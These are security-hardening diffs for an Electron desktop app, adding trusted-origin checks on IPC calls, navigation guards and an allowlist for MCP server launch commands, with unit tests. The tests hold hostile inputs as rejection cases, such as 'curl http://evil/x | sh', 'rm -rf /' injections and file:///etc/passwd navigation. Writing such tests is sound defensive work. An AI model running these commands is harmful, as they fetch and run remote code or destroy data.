+    // The config may include per-server `env` (e.g. MCP API keys), so restrict
+    // the read to the trusted origin (H5), consistent with the token reads.
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked mcp:get-config from untrusted sender');
+      return { mcpServers: {} };
+    }
     const mcpManager = getMCPManager();
     const config = mcpManager.getConfig();
     logger.debug('Returning config to renderer', { config });
@@ -263,7 +269,11 @@ export function registerIPCHandlers(): void {
     }
   });
 
-  ipcMain.handle('mcp:stop-server', async (_event, name: string) => {
+  ipcMain.handle('mcp:stop-server', async (event, name: string) => {
+    if (!isTrustedSender(event)) {
+      console.warn('[IPC] Blocked mcp:stop-server from untrusted sender');
+      return { success: false, error: 'Untrusted sender origin' };
+    }
     const mcpManager = getMCPManager();
     try {
       await mcpManager.stopServer(name);

--- a/apps/desktop/src/main/window.ts
+++ b/apps/desktop/src/main/window.ts
@@ -5,6 +5,7 @@ import { getAppUrl } from './app-url';
 import { mainWindow, setMainWindow, isQuitting } from './state';
 import { injectDesktopStyles, injectDoubleClickHandler } from './window-injections';
 import { setupAutoUpdater } from './updater';
+import { isAllowedNavigation } from '../shared/navigation-guard';
 
 const storeAny = store as any;
 
@@ -89,12 +90,34 @@ export function createWindow(): void {
     setMainWindow(null);
   });
 
+  // Hard-block any renderer-initiated navigation away from the configured app
+  // origin (security finding H5). An XSS in the web app must not be able to
+  // point the privileged renderer at an attacker origin (which would then have
+  // the preload bridge: raw session token + MCP exec). Off-origin http(s) links
+  // are opened in the system browser instead; everything else is dropped.
+  const guardNavigation = (event: Electron.Event, url: string): void => {
+    const appOrigin = new URL(getAppUrl()).origin;
+    if (isAllowedNavigation(url, appOrigin)) return;
+    event.preventDefault();
+    if (url.startsWith('http://') || url.startsWith('https://')) {
+      void shell.openExternal(url);
+    } else {
+      console.warn('[Navigation] Blocked navigation to non-app URL:', url);
+    }
+  };
+
+  window.webContents.on('will-navigate', guardNavigation);
+  window.webContents.on('will-redirect', guardNavigation);
+
   window.webContents.setWindowOpenHandler(({ url }) => {
     if (url.startsWith('http://') || url.startsWith('https://')) {
-      shell.openExternal(url);
-      return { action: 'deny' };
+      void shell.openExternal(url);
+    } else {
+      console.warn('[Navigation] Blocked window.open for non-http(s) URL:', url);
     }
-    return { action: 'allow' };
+    // Never let the renderer spawn a new privileged window; external links open
+    // in the system browser, all other schemes are denied.
+    return { action: 'deny' };
   });
 
   if (process.env.NODE_ENV !== 'development') {

--- a/apps/desktop/src/main/window.ts
+++ b/apps/desktop/src/main/window.ts
@@ -5,7 +5,7 @@ import { getAppUrl } from './app-url';
 import { mainWindow, setMainWindow, isQuitting } from './state';
 import { injectDesktopStyles, injectDoubleClickHandler } from './window-injections';
 import { setupAutoUpdater } from './updater';
-import { isAllowedNavigation } from '../shared/navigation-guard';
+import { classifyNavigation } from '../shared/navigation-guard';
 
 const storeAny = store as any;
 
@@ -105,12 +105,25 @@ export function createWindow(): void {
       console.warn('[Navigation] Blocked navigation; app origin unresolved for URL:', url);
       return;
     }
-    if (isAllowedNavigation(url, appOrigin)) return;
-    event.preventDefault();
-    if (url.startsWith('http://') || url.startsWith('https://')) {
-      void shell.openExternal(url);
-    } else {
-      console.warn('[Navigation] Blocked navigation to non-app URL:', url);
+    switch (classifyNavigation(url, appOrigin)) {
+      case 'allow':
+        // Same-origin app navigation — let it proceed.
+        return;
+      case 'deep-link':
+        // The app's own scheme must reach the OS deep-link handler; blocking it
+        // would break the magic-link exchange handoff (already CSRF-bound, L9).
+        return;
+      case 'open-external':
+        // Off-origin web link — keep it out of the privileged renderer, open in
+        // the system browser instead.
+        event.preventDefault();
+        void shell.openExternal(url);
+        return;
+      case 'block':
+      default:
+        event.preventDefault();
+        console.warn('[Navigation] Blocked navigation to non-app URL:', url);
+        return;
     }
   };
 

--- a/apps/desktop/src/main/window.ts
+++ b/apps/desktop/src/main/window.ts
@@ -96,7 +96,15 @@ export function createWindow(): void {
   // the preload bridge: raw session token + MCP exec). Off-origin http(s) links
   // are opened in the system browser instead; everything else is dropped.
   const guardNavigation = (event: Electron.Event, url: string): void => {
-    const appOrigin = new URL(getAppUrl()).origin;
+    let appOrigin: string;
+    try {
+      appOrigin = new URL(getAppUrl()).origin;
+    } catch {
+      // Configured app URL is unparseable — fail closed and block.
+      event.preventDefault();
+      console.warn('[Navigation] Blocked navigation; app origin unresolved for URL:', url);
+      return;
+    }
     if (isAllowedNavigation(url, appOrigin)) return;
     event.preventDefault();
     if (url.startsWith('http://') || url.startsWith('https://')) {

--- a/apps/desktop/src/preload/index.ts
+++ b/apps/desktop/src/preload/index.ts
@@ -51,6 +51,9 @@ contextBridge.exposeInMainWorld('electron', {
   auth: {
     getSessionToken: () => ipcRenderer.invoke('auth:get-session-token'),
     getSession: () => ipcRenderer.invoke('auth:get-session'),
+    // Begin a desktop-initiated auth flow (binds the returning
+    // pagespace://auth-exchange deep link to this instance — finding L9).
+    beginExchange: () => ipcRenderer.invoke('auth:begin-exchange'),
     storeSession: (session: {
       sessionToken: string;
       csrfToken?: string | null;
@@ -147,6 +150,7 @@ export interface ElectronAPI {
       csrfToken?: string | null;
       deviceToken?: string | null;
     } | null>;
+    beginExchange: () => Promise<string | null>;
     storeSession: (session: {
       sessionToken: string;
       csrfToken?: string | null;

--- a/apps/desktop/src/shared/__tests__/mcp-validation-commands.test.ts
+++ b/apps/desktop/src/shared/__tests__/mcp-validation-commands.test.ts
@@ -20,7 +20,13 @@ describe('validateMcpServerConfig (pure)', () => {
 
   it('accepts an absolute path whose basename is an allowed runtime', () => {
     expect(validateMcpServerConfig({ command: '/usr/local/bin/node', args: [] })).toEqual({ ok: true });
-    expect(validateMcpServerConfig({ command: 'C:\\\\Program Files\\\\nodejs\\\\node.exe', args: [] })).toEqual({ ok: true });
+    expect(validateMcpServerConfig({ command: 'C:\\Program Files\\nodejs\\node.exe', args: [] })).toEqual({ ok: true });
+  });
+
+  it('accepts a Windows path containing parentheses (Program Files (x86))', () => {
+    expect(
+      validateMcpServerConfig({ command: 'C:\\Program Files (x86)\\nodejs\\node.exe', args: [] }),
+    ).toEqual({ ok: true });
   });
 
   it('rejects shell interpreters', () => {
@@ -31,10 +37,18 @@ describe('validateMcpServerConfig (pure)', () => {
     }
   });
 
-  it('rejects commands containing shell metacharacters', () => {
+  it('rejects shell-injection-style commands via the basename allowlist', () => {
+    // No shell is used to spawn, so metacharacters are inert; the basename
+    // simply fails the allowlist (it is not exactly an allowed runtime).
     const result = validateMcpServerConfig({ command: 'node; rm -rf /', args: [] });
     expect(result.ok).toBe(false);
-    expect(result.reason).toMatch(/shell metacharacters/);
+    expect(result.reason).toMatch(/not an allowed MCP runtime/);
+  });
+
+  it('rejects commands containing control characters', () => {
+    const result = validateMcpServerConfig({ command: 'node\n', args: [] });
+    expect(result.ok).toBe(false);
+    expect(result.reason).toMatch(/control characters/);
   });
 
   it('rejects an empty or non-string command', () => {

--- a/apps/desktop/src/shared/__tests__/mcp-validation-commands.test.ts
+++ b/apps/desktop/src/shared/__tests__/mcp-validation-commands.test.ts
@@ -70,6 +70,34 @@ describe('validateMcpServerConfig (pure)', () => {
   it('allows omitting args entirely', () => {
     expect(validateMcpServerConfig({ command: 'node' })).toEqual({ ok: true });
   });
+
+  it('rejects inline-code-eval flags on interpreter runtimes', () => {
+    const cases: Array<[string, string[]]> = [
+      ['node', ['-e', 'require("child_process").exec("rm -rf /")']],
+      ['node', ['--eval=process.exit()']],
+      ['node', ['-p', '1+1']],
+      ['bun', ['-e', 'Bun.spawn(["sh"])']],
+      ['deno', ['--eval', 'Deno.run({cmd:["sh"]})']],
+      ['python', ['-c', 'import os; os.system("id")']],
+      ['python3', ['-c', 'print(1)']],
+    ];
+    for (const [command, args] of cases) {
+      const result = validateMcpServerConfig({ command, args });
+      expect(result.ok).toBe(false);
+      expect(result.reason).toMatch(/Inline-code flag/);
+    }
+  });
+
+  it('does NOT block node -c (syntax check is not an eval flag)', () => {
+    expect(validateMcpServerConfig({ command: 'node', args: ['-c', 'server.js'] })).toEqual({ ok: true });
+  });
+
+  it('allows legitimate MCP server launches (script/package/module)', () => {
+    expect(validateMcpServerConfig({ command: 'node', args: ['dist/index.js'] })).toEqual({ ok: true });
+    expect(validateMcpServerConfig({ command: 'npx', args: ['-y', '@scope/mcp-server'] })).toEqual({ ok: true });
+    expect(validateMcpServerConfig({ command: 'python3', args: ['-m', 'my_server'] })).toEqual({ ok: true });
+    expect(validateMcpServerConfig({ command: 'uvx', args: ['some-mcp'] })).toEqual({ ok: true });
+  });
 });
 
 describe('schema integration rejects malicious commands', () => {

--- a/apps/desktop/src/shared/__tests__/mcp-validation-commands.test.ts
+++ b/apps/desktop/src/shared/__tests__/mcp-validation-commands.test.ts
@@ -1,0 +1,84 @@
+import { describe, it, expect, vi } from 'vitest';
+
+vi.mock('../../main/logger', () => ({
+  logger: { debug: vi.fn(), info: vi.fn(), warn: vi.fn(), error: vi.fn() },
+}));
+
+import {
+  ALLOWED_MCP_COMMANDS,
+  validateMcpServerConfig,
+  validateMCPConfig,
+  validateServerConfig,
+} from '../mcp-validation';
+
+describe('validateMcpServerConfig (pure)', () => {
+  it('accepts allowed runtimes with string args', () => {
+    for (const command of ALLOWED_MCP_COMMANDS) {
+      expect(validateMcpServerConfig({ command, args: ['-y', 'pkg'] })).toEqual({ ok: true });
+    }
+  });
+
+  it('accepts an absolute path whose basename is an allowed runtime', () => {
+    expect(validateMcpServerConfig({ command: '/usr/local/bin/node', args: [] })).toEqual({ ok: true });
+    expect(validateMcpServerConfig({ command: 'C:\\\\Program Files\\\\nodejs\\\\node.exe', args: [] })).toEqual({ ok: true });
+  });
+
+  it('rejects shell interpreters', () => {
+    for (const command of ['sh', 'bash', 'zsh', 'cmd', 'powershell', '/bin/sh']) {
+      const result = validateMcpServerConfig({ command, args: ['-c', 'curl evil | sh'] });
+      expect(result.ok).toBe(false);
+      expect(result.reason).toMatch(/not an allowed MCP runtime/);
+    }
+  });
+
+  it('rejects commands containing shell metacharacters', () => {
+    const result = validateMcpServerConfig({ command: 'node; rm -rf /', args: [] });
+    expect(result.ok).toBe(false);
+    expect(result.reason).toMatch(/shell metacharacters/);
+  });
+
+  it('rejects an empty or non-string command', () => {
+    expect(validateMcpServerConfig({ command: '', args: [] }).ok).toBe(false);
+    expect(validateMcpServerConfig({ command: '   ', args: [] }).ok).toBe(false);
+    expect(validateMcpServerConfig({ command: 123, args: [] }).ok).toBe(false);
+  });
+
+  it('rejects a non-object config', () => {
+    expect(validateMcpServerConfig(null).ok).toBe(false);
+    expect(validateMcpServerConfig('node').ok).toBe(false);
+  });
+
+  it('rejects args that are not an array of strings', () => {
+    expect(validateMcpServerConfig({ command: 'node', args: 'foo' }).ok).toBe(false);
+    expect(validateMcpServerConfig({ command: 'node', args: [1, 2] }).ok).toBe(false);
+  });
+
+  it('allows omitting args entirely', () => {
+    expect(validateMcpServerConfig({ command: 'node' })).toEqual({ ok: true });
+  });
+});
+
+describe('schema integration rejects malicious commands', () => {
+  it('validateMCPConfig rejects a server launching sh', () => {
+    const result = validateMCPConfig({
+      mcpServers: {
+        evil: { command: 'sh', args: ['-c', 'curl http://evil/x | sh'] },
+      },
+    });
+    expect(result.success).toBe(false);
+  });
+
+  it('validateMCPConfig accepts a legitimate npx server', () => {
+    const result = validateMCPConfig({
+      mcpServers: {
+        filesystem: { command: 'npx', args: ['-y', '@modelcontextprotocol/server-filesystem', '/tmp'] },
+      },
+    });
+    expect(result.success).toBe(true);
+  });
+
+  it('validateServerConfig rejects a single malicious server', () => {
+    const result = validateServerConfig('evil', { command: 'bash', args: ['-c', 'whoami'] });
+    expect(result.success).toBe(false);
+  });
+});

--- a/apps/desktop/src/shared/__tests__/navigation-guard.test.ts
+++ b/apps/desktop/src/shared/__tests__/navigation-guard.test.ts
@@ -4,6 +4,7 @@ import {
   isAllowedNavigation,
   isAllowedAppUrl,
   isTrustedSenderUrl,
+  classifyNavigation,
 } from '../navigation-guard';
 
 describe('isAllowedNavigation', () => {
@@ -86,6 +87,41 @@ describe('isAllowedAppUrl', () => {
   it('ignores unparseable allowlist entries', () => {
     expect(isAllowedAppUrl('https://pagespace.ai', ['', 'garbage', 'https://pagespace.ai'])).toBe(true);
     expect(isAllowedAppUrl('https://pagespace.ai', ['', 'garbage'])).toBe(false);
+  });
+});
+
+describe('classifyNavigation', () => {
+  const appOrigin = 'https://pagespace.ai';
+
+  it('allows same-origin navigation', () => {
+    expect(classifyNavigation('https://pagespace.ai/dashboard', appOrigin)).toBe('allow');
+  });
+
+  it('passes the app deep-link scheme through to the OS handler', () => {
+    expect(classifyNavigation('pagespace://auth-exchange?code=x&state=y', appOrigin)).toBe('deep-link');
+    expect(classifyNavigation('pagespace://passkey-registered', appOrigin)).toBe('deep-link');
+  });
+
+  it('routes off-origin web links to the system browser', () => {
+    expect(classifyNavigation('https://evil.com/phish', appOrigin)).toBe('open-external');
+    expect(classifyNavigation('http://example.com/', appOrigin)).toBe('open-external');
+  });
+
+  it('blocks file:// and other custom schemes', () => {
+    expect(classifyNavigation('file:///etc/passwd', appOrigin)).toBe('block');
+    expect(classifyNavigation('javascript:alert(1)', appOrigin)).toBe('block');
+    expect(classifyNavigation('mailto:a@b.c', appOrigin)).toBe('block');
+  });
+
+  it('blocks unparseable input', () => {
+    expect(classifyNavigation('not a url', appOrigin)).toBe('block');
+    expect(classifyNavigation('', appOrigin)).toBe('block');
+  });
+
+  it('does not allow a foreign origin even when the app origin is unparseable', () => {
+    // Caller fails closed on a bad origin; this fn must never return "allow".
+    expect(classifyNavigation('https://evil.com', 'garbage')).toBe('open-external');
+    expect(classifyNavigation('https://pagespace.ai', 'garbage')).not.toBe('allow');
   });
 });
 

--- a/apps/desktop/src/shared/__tests__/navigation-guard.test.ts
+++ b/apps/desktop/src/shared/__tests__/navigation-guard.test.ts
@@ -1,0 +1,110 @@
+import { describe, it, expect } from 'vitest';
+import {
+  ALLOWED_APP_ORIGINS,
+  isAllowedNavigation,
+  isAllowedAppUrl,
+  isTrustedSenderUrl,
+} from '../navigation-guard';
+
+describe('isAllowedNavigation', () => {
+  const appOrigin = 'https://pagespace.ai';
+
+  it('allows same-origin navigation regardless of path/query/hash', () => {
+    expect(isAllowedNavigation('https://pagespace.ai/dashboard', appOrigin)).toBe(true);
+    expect(isAllowedNavigation('https://pagespace.ai/drive/123?x=1#h', appOrigin)).toBe(true);
+    expect(isAllowedNavigation('https://pagespace.ai', appOrigin)).toBe(true);
+  });
+
+  it('blocks a different origin', () => {
+    expect(isAllowedNavigation('https://evil.com/phish', appOrigin)).toBe(false);
+  });
+
+  it('blocks lookalike suffix/subdomain hosts', () => {
+    expect(isAllowedNavigation('https://pagespace.ai.evil.com/', appOrigin)).toBe(false);
+    expect(isAllowedNavigation('https://evil.pagespace.ai/', appOrigin)).toBe(false);
+  });
+
+  it('blocks a protocol downgrade to http on a secure origin', () => {
+    expect(isAllowedNavigation('http://pagespace.ai/dashboard', appOrigin)).toBe(false);
+  });
+
+  it('blocks a different port', () => {
+    expect(isAllowedNavigation('https://pagespace.ai:8443/', appOrigin)).toBe(false);
+  });
+
+  it('blocks non-http(s) schemes even on the same host', () => {
+    expect(isAllowedNavigation('file:///etc/passwd', appOrigin)).toBe(false);
+    expect(isAllowedNavigation('javascript:alert(1)', appOrigin)).toBe(false);
+    expect(isAllowedNavigation('pagespace://auth-exchange?code=x', appOrigin)).toBe(false);
+  });
+
+  it('blocks unparseable input and empty strings', () => {
+    expect(isAllowedNavigation('not-a-url', appOrigin)).toBe(false);
+    expect(isAllowedNavigation('', appOrigin)).toBe(false);
+  });
+
+  it('fails closed on an unparseable app origin', () => {
+    expect(isAllowedNavigation('https://pagespace.ai/x', 'not-an-origin')).toBe(false);
+  });
+
+  it('supports localhost http app origins for development', () => {
+    expect(isAllowedNavigation('http://localhost:3000/dashboard', 'http://localhost:3000')).toBe(true);
+    expect(isAllowedNavigation('http://localhost:3001/dashboard', 'http://localhost:3000')).toBe(false);
+  });
+});
+
+describe('isAllowedAppUrl', () => {
+  it('accepts URLs whose origin is in the static allowlist', () => {
+    expect(isAllowedAppUrl('https://pagespace.ai/dashboard', ALLOWED_APP_ORIGINS)).toBe(true);
+    expect(isAllowedAppUrl('https://www.pagespace.ai', ALLOWED_APP_ORIGINS)).toBe(true);
+    expect(isAllowedAppUrl('http://localhost:3000/x', ALLOWED_APP_ORIGINS)).toBe(true);
+    expect(isAllowedAppUrl('http://127.0.0.1:3000', ALLOWED_APP_ORIGINS)).toBe(true);
+  });
+
+  it('rejects origins not in the allowlist', () => {
+    expect(isAllowedAppUrl('https://evil.com', ALLOWED_APP_ORIGINS)).toBe(false);
+    expect(isAllowedAppUrl('https://pagespace.ai.evil.com', ALLOWED_APP_ORIGINS)).toBe(false);
+  });
+
+  it('rejects a protocol downgrade on an https allowlist origin', () => {
+    expect(isAllowedAppUrl('http://pagespace.ai', ALLOWED_APP_ORIGINS)).toBe(false);
+  });
+
+  it('rejects custom schemes and unparseable values', () => {
+    expect(isAllowedAppUrl('pagespace://evil', ALLOWED_APP_ORIGINS)).toBe(false);
+    expect(isAllowedAppUrl('file:///tmp', ALLOWED_APP_ORIGINS)).toBe(false);
+    expect(isAllowedAppUrl('', ALLOWED_APP_ORIGINS)).toBe(false);
+    expect(isAllowedAppUrl('javascript:alert(1)', ALLOWED_APP_ORIGINS)).toBe(false);
+  });
+
+  it('honors a caller-supplied allowlist (e.g. env-configured origin)', () => {
+    const allowlist = [...ALLOWED_APP_ORIGINS, 'https://app.example.com'];
+    expect(isAllowedAppUrl('https://app.example.com/dashboard', allowlist)).toBe(true);
+    expect(isAllowedAppUrl('https://other.example.com', allowlist)).toBe(false);
+  });
+
+  it('ignores unparseable allowlist entries', () => {
+    expect(isAllowedAppUrl('https://pagespace.ai', ['', 'garbage', 'https://pagespace.ai'])).toBe(true);
+    expect(isAllowedAppUrl('https://pagespace.ai', ['', 'garbage'])).toBe(false);
+  });
+});
+
+describe('isTrustedSenderUrl', () => {
+  const appOrigin = 'https://pagespace.ai';
+
+  it('trusts a sender frame on the app origin', () => {
+    expect(isTrustedSenderUrl('https://pagespace.ai/dashboard', appOrigin)).toBe(true);
+  });
+
+  it('fails closed when the sender URL is missing', () => {
+    expect(isTrustedSenderUrl(undefined, appOrigin)).toBe(false);
+    expect(isTrustedSenderUrl(null, appOrigin)).toBe(false);
+    expect(isTrustedSenderUrl('', appOrigin)).toBe(false);
+  });
+
+  it('rejects a sender frame on a foreign or downgraded origin', () => {
+    expect(isTrustedSenderUrl('https://evil.com', appOrigin)).toBe(false);
+    expect(isTrustedSenderUrl('http://pagespace.ai', appOrigin)).toBe(false);
+    expect(isTrustedSenderUrl('file:///offline.html', appOrigin)).toBe(false);
+  });
+});

--- a/apps/desktop/src/shared/mcp-validation.ts
+++ b/apps/desktop/src/shared/mcp-validation.ts
@@ -23,8 +23,15 @@ export const ALLOWED_MCP_COMMANDS: readonly string[] = [
   'uvx',
 ];
 
-/** Characters that would let a value break out into a shell. */
-const SHELL_METACHARACTERS = /[;&|`$(){}<>\n\r]/;
+/**
+ * Control characters never belong in an executable path. The server is spawned
+ * WITHOUT a shell (`spawn(command, args)` in mcp-manager), so ordinary shell
+ * metacharacters are passed literally and are not a shell-injection vector —
+ * and rejecting them would break legitimate paths like
+ * `C:\Program Files (x86)\nodejs\node.exe`. The basename allowlist below is the
+ * real control; this check only rejects control characters.
+ */
+const CONTROL_CHARACTERS = /[\u0000-\u001f]/;
 
 export interface McpServerConfigValidation {
   ok: boolean;
@@ -39,7 +46,7 @@ function commandBasename(command: string): string {
 
 /**
  * PURE. Validate a single MCP server config's launcher. Rejects empty/non-string
- * commands, shell metacharacters, and any command whose basename is not an
+ * commands, control characters, and any command whose basename is not an
  * allowed runtime. Args, when present, must be an array of strings.
  */
 export function validateMcpServerConfig(cfg: unknown): McpServerConfigValidation {
@@ -51,8 +58,8 @@ export function validateMcpServerConfig(cfg: unknown): McpServerConfigValidation
   if (typeof command !== 'string' || command.trim().length === 0) {
     return { ok: false, reason: 'Command is required' };
   }
-  if (SHELL_METACHARACTERS.test(command)) {
-    return { ok: false, reason: 'Command contains forbidden shell metacharacters' };
+  if (CONTROL_CHARACTERS.test(command)) {
+    return { ok: false, reason: 'Command contains forbidden control characters' };
   }
   if (!ALLOWED_MCP_COMMANDS.includes(commandBasename(command))) {
     return {

--- a/apps/desktop/src/shared/mcp-validation.ts
+++ b/apps/desktop/src/shared/mcp-validation.ts
@@ -2,16 +2,94 @@ import { z } from 'zod';
 import { logger } from '../main/logger';
 
 /**
+ * Allowed MCP server launcher commands (security finding H5).
+ *
+ * An MCP server is spawned by the privileged main process. The renderer can
+ * push a new config via `mcp:update-config`, so an XSS in the web app could
+ * otherwise set `command: 'sh'` (or any host binary) and execute arbitrary
+ * processes. We therefore restrict the launcher to a fixed allowlist of known
+ * runtimes. Absolute/relative paths are permitted only when their basename is
+ * an allowed runtime (e.g. `/usr/local/bin/node`).
+ */
+export const ALLOWED_MCP_COMMANDS: readonly string[] = [
+  'node',
+  'npx',
+  'bun',
+  'bunx',
+  'deno',
+  'python',
+  'python3',
+  'uv',
+  'uvx',
+];
+
+/** Characters that would let a value break out into a shell. */
+const SHELL_METACHARACTERS = /[;&|`$(){}<>\n\r]/;
+
+export interface McpServerConfigValidation {
+  ok: boolean;
+  reason?: string;
+}
+
+/** Normalize a command to its lowercase basename, stripping a Windows suffix. */
+function commandBasename(command: string): string {
+  const base = command.split(/[/\\]/).pop() ?? command;
+  return base.toLowerCase().replace(/\.(exe|cmd|bat|com)$/i, '');
+}
+
+/**
+ * PURE. Validate a single MCP server config's launcher. Rejects empty/non-string
+ * commands, shell metacharacters, and any command whose basename is not an
+ * allowed runtime. Args, when present, must be an array of strings.
+ */
+export function validateMcpServerConfig(cfg: unknown): McpServerConfigValidation {
+  if (cfg === null || typeof cfg !== 'object') {
+    return { ok: false, reason: 'Server config must be an object' };
+  }
+  const { command, args } = cfg as { command?: unknown; args?: unknown };
+
+  if (typeof command !== 'string' || command.trim().length === 0) {
+    return { ok: false, reason: 'Command is required' };
+  }
+  if (SHELL_METACHARACTERS.test(command)) {
+    return { ok: false, reason: 'Command contains forbidden shell metacharacters' };
+  }
+  if (!ALLOWED_MCP_COMMANDS.includes(commandBasename(command))) {
+    return {
+      ok: false,
+      reason: `Command "${command}" is not an allowed MCP runtime (allowed: ${ALLOWED_MCP_COMMANDS.join(', ')})`,
+    };
+  }
+  if (args !== undefined) {
+    if (!Array.isArray(args) || !args.every((a) => typeof a === 'string')) {
+      return { ok: false, reason: 'Args must be an array of strings' };
+    }
+  }
+  return { ok: true };
+}
+
+/**
  * Zod schema for MCP Server configuration validation
  */
-export const MCPServerConfigSchema = z.object({
-  command: z.string().min(1, 'Command is required'),
-  args: z.array(z.string()),
-  env: z.record(z.string(), z.string()).optional(),  // Zod v4 requires both key and value schemas
-  autoStart: z.boolean().optional(),
-  enabled: z.boolean().optional(),
-  timeout: z.number().min(1000).max(300000).optional(),
-});
+export const MCPServerConfigSchema = z
+  .object({
+    command: z.string().min(1, 'Command is required'),
+    args: z.array(z.string()),
+    env: z.record(z.string(), z.string()).optional(),  // Zod v4 requires both key and value schemas
+    autoStart: z.boolean().optional(),
+    enabled: z.boolean().optional(),
+    timeout: z.number().min(1000).max(300000).optional(),
+  })
+  .superRefine((cfg, ctx) => {
+    const result = validateMcpServerConfig(cfg);
+    if (!result.ok) {
+      ctx.addIssue({
+        code: z.ZodIssueCode.custom,
+        message: result.reason ?? 'Invalid MCP server configuration',
+        path: ['command'],
+      });
+    }
+  });
 
 /**
  * Zod schema for full MCP configuration

--- a/apps/desktop/src/shared/mcp-validation.ts
+++ b/apps/desktop/src/shared/mcp-validation.ts
@@ -45,9 +45,38 @@ function commandBasename(command: string): string {
 }
 
 /**
+ * Inline-code-evaluation flags per runtime. Real MCP servers launch a script
+ * file or package (`node dist/index.js`, `npx -y @scope/server`, `python -m
+ * server`) — none pass inline source. Rejecting these flags closes the
+ * `node -e <payload>` / `python -c <payload>` execution vectors with no
+ * false-positives, while keeping the check runtime-aware (e.g. `node -c` is a
+ * harmless syntax check, NOT an eval flag, so it is not blocked). Package
+ * runtimes (npx/bunx/uv/uvx) have no inline-eval flag.
+ */
+const INLINE_EVAL_FLAGS: Readonly<Record<string, readonly string[]>> = {
+  node: ['-e', '--eval', '-p', '--print'],
+  bun: ['-e', '--eval', '-p', '--print'],
+  deno: ['-e', '--eval', '-p', '--print'],
+  python: ['-c'],
+  python3: ['-c'],
+};
+
+/** True when an arg is an inline-eval flag (exact or `--flag=value` form). */
+function isInlineEvalArg(arg: string, flags: readonly string[]): boolean {
+  return flags.some((flag) => arg === flag || arg.startsWith(`${flag}=`));
+}
+
+/**
  * PURE. Validate a single MCP server config's launcher. Rejects empty/non-string
- * commands, control characters, and any command whose basename is not an
- * allowed runtime. Args, when present, must be an array of strings.
+ * commands, control characters, any command whose basename is not an allowed
+ * runtime, and inline-code-eval flags on interpreter runtimes. Args, when
+ * present, must be an array of strings.
+ *
+ * NOTE: package runtimes (`npx <pkg>` / `node <script>`) inherently execute the
+ * code they are pointed at — that is the MCP feature itself. This validator
+ * raises the bar (no direct shells, no inline eval) but cannot make MCP-server
+ * configuration non-RCE; that capability is gated by the trusted-origin check
+ * on `mcp:update-config` and is an explicit, user-initiated local action.
  */
 export function validateMcpServerConfig(cfg: unknown): McpServerConfigValidation {
   if (cfg === null || typeof cfg !== 'object') {
@@ -61,15 +90,25 @@ export function validateMcpServerConfig(cfg: unknown): McpServerConfigValidation
   if (CONTROL_CHARACTERS.test(command)) {
     return { ok: false, reason: 'Command contains forbidden control characters' };
   }
-  if (!ALLOWED_MCP_COMMANDS.includes(commandBasename(command))) {
+  const basename = commandBasename(command);
+  if (!ALLOWED_MCP_COMMANDS.includes(basename)) {
     return {
       ok: false,
       reason: `Command "${command}" is not an allowed MCP runtime (allowed: ${ALLOWED_MCP_COMMANDS.join(', ')})`,
     };
   }
-  if (args !== undefined) {
-    if (!Array.isArray(args) || !args.every((a) => typeof a === 'string')) {
-      return { ok: false, reason: 'Args must be an array of strings' };
+  if (args !== undefined && (!Array.isArray(args) || !args.every((a) => typeof a === 'string'))) {
+    return { ok: false, reason: 'Args must be an array of strings' };
+  }
+  const argList: string[] = Array.isArray(args) ? args : [];
+  const evalFlags = INLINE_EVAL_FLAGS[basename];
+  if (evalFlags) {
+    const offending = argList.find((arg) => isInlineEvalArg(arg, evalFlags));
+    if (offending) {
+      return {
+        ok: false,
+        reason: `Inline-code flag "${offending}" is not allowed for runtime "${basename}"`,
+      };
     }
   }
   return { ok: true };

--- a/apps/desktop/src/shared/navigation-guard.ts
+++ b/apps/desktop/src/shared/navigation-guard.ts
@@ -1,0 +1,78 @@
+/**
+ * Navigation / origin hardening (security finding H5).
+ *
+ * Pure, dependency-free decision helpers for the Electron main process. They
+ * decide whether the renderer may navigate to a URL, whether a caller-supplied
+ * `set-app-url` value is acceptable, and whether an IPC sender frame is the
+ * trusted app origin. Keeping these pure makes the security decisions
+ * exhaustively unit-testable; the main-process wiring stays thin.
+ */
+
+/**
+ * Origins the desktop shell is allowed to load as the application. Used as the
+ * allowlist for `set-app-url`. The currently-configured origin (from
+ * PAGESPACE_URL) is added by the caller so env-configured deployments keep
+ * working without widening the static list.
+ */
+export const ALLOWED_APP_ORIGINS: readonly string[] = [
+  'https://pagespace.ai',
+  'https://www.pagespace.ai',
+  'http://localhost:3000',
+  'http://127.0.0.1:3000',
+];
+
+function parseUrl(value: string): URL | null {
+  try {
+    return new URL(value);
+  } catch {
+    return null;
+  }
+}
+
+function safeOrigin(value: string): string | null {
+  const parsed = parseUrl(value);
+  return parsed ? parsed.origin : null;
+}
+
+/**
+ * True only when `targetUrl` is an http(s) URL whose origin is exactly the
+ * application origin. Everything else (other origins, file://, custom schemes,
+ * unparseable input) is blocked. Drives the `will-navigate` / `will-redirect`
+ * guards so an XSS in the web app cannot navigate the privileged renderer to an
+ * attacker-controlled origin.
+ */
+export function isAllowedNavigation(targetUrl: string, appOrigin: string): boolean {
+  const target = parseUrl(targetUrl);
+  if (!target) return false;
+  if (target.protocol !== 'http:' && target.protocol !== 'https:') return false;
+
+  const origin = safeOrigin(appOrigin);
+  if (!origin) return false;
+
+  return target.origin === origin;
+}
+
+/**
+ * True when `url` is an http(s) URL whose origin is present in `allowlist`.
+ * Allowlist entries are compared by origin so a path/query on an allowed origin
+ * is accepted while lookalike hosts, downgraded protocols and custom schemes
+ * are rejected.
+ */
+export function isAllowedAppUrl(url: string, allowlist: readonly string[]): boolean {
+  const parsed = parseUrl(url);
+  if (!parsed) return false;
+  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return false;
+
+  return allowlist.some((allowed) => safeOrigin(allowed) === parsed.origin);
+}
+
+/**
+ * True when the IPC sender frame URL is the trusted app origin. Fails closed
+ * when the sender URL is missing/unparseable. Used to keep capability-bearing
+ * bridge calls (raw session token, MCP exec, set-app-url) answerable only to
+ * the trusted origin.
+ */
+export function isTrustedSenderUrl(senderUrl: string | undefined | null, appOrigin: string): boolean {
+  if (!senderUrl) return false;
+  return isAllowedNavigation(senderUrl, appOrigin);
+}

--- a/apps/desktop/src/shared/navigation-guard.ts
+++ b/apps/desktop/src/shared/navigation-guard.ts
@@ -76,3 +76,42 @@ export function isTrustedSenderUrl(senderUrl: string | undefined | null, appOrig
   if (!senderUrl) return false;
   return isAllowedNavigation(senderUrl, appOrigin);
 }
+
+/** The app's own deep-link scheme, used by the OS deep-link handler. */
+export const APP_DEEP_LINK_SCHEME = 'pagespace:';
+
+/**
+ * Outcome of evaluating a renderer-initiated navigation:
